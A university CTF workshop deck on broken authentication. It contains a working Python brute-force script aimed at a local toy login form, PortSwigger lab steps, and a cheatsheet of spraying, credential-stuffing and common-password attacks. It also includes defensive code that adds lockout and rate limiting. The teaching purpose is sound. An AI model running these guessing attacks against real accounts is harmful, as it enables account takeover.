SPRING 2026 · CTF WORKSHOP SERIES · PSU

Broken
Authentication

If a login system lets you try unlimited passwords or uses weak checks, anyone can break into accounts just by guessing or reusing credentials. We're going to do exactly that.

SECTION 01 · LEARNING OBJECTIVES

What You'll Learn

By the end of this workshop, you'll be able to spot and exploit weak login mechanisms—one of the most common entry points for attackers.

01
Identify
Recognize common authentication weaknesses in login systems: lack of rate limiting, weak password policies, and predictable credentials.
02
Bypass
Exploit misconfigured or weak login mechanisms to gain unauthorized access without valid credentials.
03
Exploit
Leverage missing rate limits or guessable passwords to brute-force accounts—just like real attackers do.
SECTION 02 · CORE CONCEPTS

Authentication Failures

Authentication verifies who a user is. When it's weak, attackers can simply imitate legitimate users.

THE PROBLEM
Weak Enforcement
A vulnerability occurs when the authentication process is weak or improperly enforced. Common issues: weak passwords, unlimited login attempts, predictable credentials, or missing verification checks.
THE RULE
Strict Verification
If authentication is not strictly enforced, anyone can become a legitimate user by imitating one. Attackers don't break the system—they take advantage of poor controls.
🔁 REPEATED LOGIN ATTEMPTS · NO RATE LIMIT
ATTEMPT 1 carlos:password123 ✗ Failed
ATTEMPT 2 carlos:qwerty ✗ Failed
ATTEMPT 3 carlos:123456 ✗ Failed
ATTEMPT 4 carlos:password ✓ Success

Repeated login attempts eventually succeed because the server never limits, delays, or locks out failed attempts: it simply answers each guess with pass or fail, so the attacker can keep going until the wordlist hits.

SECTION 03 · HOW IT WORKS

The 4‑Step Brute‑Force

How attackers exploit weak authentication—from guessing to full account takeover.

01
Submit login credentials
USER ENTERS USERNAME + PASSWORD
  • Application sends request to server for verification
  • No indication of rate limiting or account lockout
02
Validate credentials weakly
SERVER CHECKS AGAINST STORED VALUES
  • Weak controls allow repeated attempts
  • No CAPTCHA, no delay, no account lockout
03
Attempt multiple logins
ATTACKER GUESSES PASSWORDS REPEATEDLY
  • Try common passwords: 123456, password, qwerty
  • No restrictions or protections stop the attempts
04
Gain unauthorized access
CORRECT CREDENTIALS GUESSED
  • Application grants access without detecting abuse
  • Attacker now operates as the legitimate user
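The four steps above, carried out end to end. This is an added example for the workshop, not PortSwigger's lab code: the target is a constructed in-process HTTP login form (assumed to accept POST /login with form fields `username` and `password`, which is also what the lab form sends) so the script runs offline, and the wordlist is the four guesses from the slide. Point `brute_force()` at a real lab URL to run it for real.

```python
"""Brute-force a login that has no rate limit, end to end.

Added example for this workshop; it is not PortSwigger's lab code. The
target is a constructed, in-process HTTP login form (assumed to accept
POST /login with form fields `username` and `password`) so the script
runs offline; point `brute_force()` at a real lab URL to use it for real.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credential store for the toy target. Plaintext only because
# it is a stand-in; a real application stores salted password hashes.
USERS = {"carlos": "password", "wiener": "peter"}

# Constructed wordlist, in the same order as the slide above.
WORDLIST = ["password123", "qwerty", "123456", "password"]


class VulnerableLogin(BaseHTTPRequestHandler):
    """Step 02 of the slide: checks the password and nothing else.
    No lockout, no delay, no CAPTCHA, no failure counter."""

    def do_POST(self):
        if self.path != "/login":
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if USERS.get(user) == password:
            body = b"<h1>My account</h1><p>Welcome back, " + user.encode() + b"</p>"
        else:
            body = b"<p>Incorrect password</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_vulnerable_server():
    """Bind the toy target to a free localhost port; return (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), VulnerableLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def brute_force(base_url, username, wordlist, timeout=5):
    """Steps 03-04: submit every candidate password for one username.

    Returns (password, attempts) on success or (None, attempts) if the
    wordlist is exhausted. Success is detected the way Burp Intruder users
    do it: first record the response to a password that is certainly wrong,
    then flag the first candidate whose status or body differs from it.
    """
    def attempt(password):
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        req = urllib.request.Request(base_url + "/login", data=data, method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()

    baseline = attempt("no-user-would-pick-this-" + "x" * 24)  # known-bad guess
    for attempts, candidate in enumerate(wordlist, start=1):
        if attempt(candidate) != baseline:
            return candidate, attempts
    return None, len(wordlist)


def run_demo():
    """Start the target, brute-force carlos, and shut the target down."""
    server, base_url = start_vulnerable_server()
    try:
        return brute_force(base_url, "carlos", WORDLIST)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    password, attempts = run_demo()
    print("carlos:%s found after %d attempts" % (password, attempts))
```

The "differs from a known-bad response" check is the same comparison Burp Intruder's length column gives you, and it is why you should look at the failure response before you start guessing. It breaks if the page embeds something that changes on every request (a CSRF token, a timestamp); in that case compare only the status code and a fixed substring such as "Incorrect password" instead of the whole body.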
SECTION 04 · DEMO WALKTHROUGH
DEMO.
PortSwigger Lab: Broken authentication (weak password / brute-force)
LAB
Authentication labs
TOOL
Web browser
STATE
Lab launched
▶ SCRIPT
# Step 1: attempt login with common credentials
Username: carlos   Password: password123
→ Expected: login fails (incorrect password)

# Step 2: try another weak/common password
Username: carlos   Password: qwerty / 123456 / password
→ Expected: login eventually succeeds

# Step 3: confirm access
Access account dashboard
→ Expected: user is logged in as carlos
Follow along on your laptop. We will run through this together.
SECTION 05 · COMMON PITFALLS

Troubleshooting

SYMPTOM: Login never succeeds
CAUSE: Incorrect username or not following lab instructions
FIX: Use the exact username provided in the lab
SYMPTOM: Students stop after one failed attempt
CAUSE: Not realizing multiple attempts are allowed
FIX: Encourage repeated guessing of common passwords
SYMPTOM: Students think the attack is unrealistic
CAUSE: Underestimating how often weak passwords are used
FIX: Emphasize real‑world use of leaked or guessable credentials
SYMPTOM: Account locked out unexpectedly
CAUSE: Lab variant includes lockout (different lab)
FIX: Ensure you're on the weak‑password / no‑rate‑limit lab
SECTION 06 · POP QUIZ

Test Your Knowledge

QUESTION 01 / 05
What is the primary purpose of authentication in a web application?
QUESTION 02 / 05
Which of the following is a sign of broken authentication?
QUESTION 03 / 05
What is the most common way attackers exploit weak authentication?
QUESTION 04 / 05
You try carlos:password and it fails. What should you do next in a lab with no rate limiting?
QUESTION 05 / 05
Which of the following best mitigates brute‑force attacks?
SECTION 07 · YOUR CHALLENGE

Now Do It Yourself

⏱ 5–10 MIN · ◉ BEGINNER
THE TASK
Use the provided lab to log in to an account by guessing weak or common passwords.
SUCCESS CRITERION
Screenshot showing successful login to the target account.
HINTS
01
Try common passwords that users often reuse.
02
Notice there is no limit on login attempts.
03
Use simple passwords like 123456, password, or qwerty.
CHEATSHEET · BROKEN AUTHENTICATION
ATTACK / PATTERN            | WHAT IT DOES                                        | WHEN TO USE
Password spraying           | Try a few common passwords against many accounts    | When account lockout exists but is per‑account
Credential stuffing         | Use leaked username/password pairs from breaches    | When users reuse passwords across sites
Brute‑force (no rate limit) | Repeatedly guess passwords for a single account     | When no lockout or CAPTCHA is present
Common passwords            | Try 123456, password, qwerty, admin                 | Always—first step in any authentication test
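The cheatsheet rows and quiz question 05 both turn on the same point: which control stops which attack. The example below is added for this workshop (it is not PortSwigger's or OWASP's code) and models a login service with the controls the lab target lacks, then replays the single-account brute force and a password spray against it. The user list, attacker address and clock are constructed so it runs offline, and the PBKDF2 cost is deliberately low for the demo.

```python
"""Rate limiting and lockout: the controls the vulnerable login lacks.

Added example for this workshop (not PortSwigger's or OWASP's code). It
models a login service with a per-account lockout and a per-source rate
limit, then replays the cheatsheet attacks against it. Users, attacker IP
and clock are constructed so it runs offline; PBKDF2_ROUNDS is a demo
value and must be raised in production.
"""
import hashlib
import hmac
import os
from collections import defaultdict

PBKDF2_ROUNDS = 20_000  # demo value; tune much higher for production
DUMMY_SALT = os.urandom(16)


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class LoginService:
    """Password check plus per-account lockout and per-source rate limit."""

    def __init__(self, users, max_per_account=5, lock_seconds=900,
                 max_per_ip=20, window_seconds=60):
        self.users = {}
        for name, password in users.items():
            salt = os.urandom(16)
            self.users[name] = (salt, hash_password(password, salt))
        self.max_per_account = max_per_account
        self.lock_seconds = lock_seconds
        self.max_per_ip = max_per_ip          # None disables the per-IP limit
        self.window_seconds = window_seconds
        self.failures = defaultdict(int)      # consecutive failures per account
        self.locked_until = {}                # account -> unlock time
        self.ip_attempts = defaultdict(list)  # source -> attempt timestamps

    def attempt(self, username, password, source_ip, now):
        """Return 'ok', 'bad', 'locked' or 'throttled'."""
        # 1. Per-source sliding window, checked before the account, so a
        #    spray (one guess per account, many accounts) is caught even
        #    though no single account ever reaches the lockout threshold.
        recent = [t for t in self.ip_attempts[source_ip]
                  if now - t < self.window_seconds]
        if self.max_per_ip is not None and len(recent) >= self.max_per_ip:
            self.ip_attempts[source_ip] = recent
            return "throttled"
        recent.append(now)
        self.ip_attempts[source_ip] = recent

        # 2. Per-account lockout. A locked account rejects even the right
        #    password, so a guess that arrives after the lock learns nothing.
        if self.locked_until.get(username, 0) > now:
            return "locked"

        # 3. Password check. Unknown users still pay the hash cost so the
        #    response time does not reveal which usernames exist.
        stored = self.users.get(username)
        if stored is None:
            hash_password(password, DUMMY_SALT)
            return "bad"
        salt, expected = stored
        if hmac.compare_digest(hash_password(password, salt), expected):
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= self.max_per_account:
            self.locked_until[username] = now + self.lock_seconds
            self.failures[username] = 0
        return "bad"


# Constructed user base: 25 accounts with strong passphrases, one of them
# (user20) with a seasonal password, plus carlos from the slides.
USERS = {"user%02d" % i: "Strong-Passphrase-%d" % i for i in range(25)}
USERS["user20"] = "Spring2026!"
USERS["carlos"] = "password"
ATTACKER_IP = "203.0.113.7"  # constructed, from the documentation range


def demo_single_account_brute_force():
    """Brute-force carlos as on the slide. The lockout triggers on the 5th
    failure, so the correct password (6th guess) is never even checked."""
    svc = LoginService(USERS)
    guesses = ["password123", "qwerty", "123456", "letmein", "welcome", "password"]
    return [svc.attempt("carlos", pw, ATTACKER_IP, now=float(i))
            for i, pw in enumerate(guesses)]


def demo_password_spray(max_per_ip):
    """One common password against every account from one source."""
    svc = LoginService(USERS, max_per_ip=max_per_ip)
    return {user: svc.attempt(user, "Spring2026!", ATTACKER_IP, now=float(i))
            for i, user in enumerate(USERS)}


if __name__ == "__main__":
    print(demo_single_account_brute_force())
    print("lockout only:", demo_password_spray(max_per_ip=None)["user20"])
    print("lockout + per-IP limit:", demo_password_spray(max_per_ip=10)["user20"])
```

With only the per-account lockout (`max_per_ip=None`) the spray still lands on user20, which is exactly the cheatsheet's "when to use" for spraying; the per-source window is what catches it. Two caveats a practitioner will raise: a lockout on its own is a denial-of-service lever (an attacker can lock victims out on purpose), and a per-IP limit is weakened by attackers rotating through proxies, so in practice these are paired with CAPTCHA, MFA, and monitoring rather than used alone.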

📎 Full cheatsheet: Broken_Authentication_Handout.pdf

SECTION 08 · FURTHER READING

Go Deeper

LAB

Username Enumeration via Different Responses

The exact PortSwigger lab used for the Broken Authentication workshop activity.

01

PortSwigger: Authentication

Hands‑on labs demonstrating real authentication flaws and attack techniques.

02

OWASP Top 10: Identification and Authentication Failures

Overview of common authentication weaknesses and their impact.

03

OWASP Authentication Cheat Sheet

Best practices for implementing secure authentication mechanisms.

PDF

Broken Authentication Handout

Full Day 4 workshop handout and quick reference.

Questions?
Bring them to the CTF WhatsApp Group.
CyberTech Club @ PSU · Spring 2026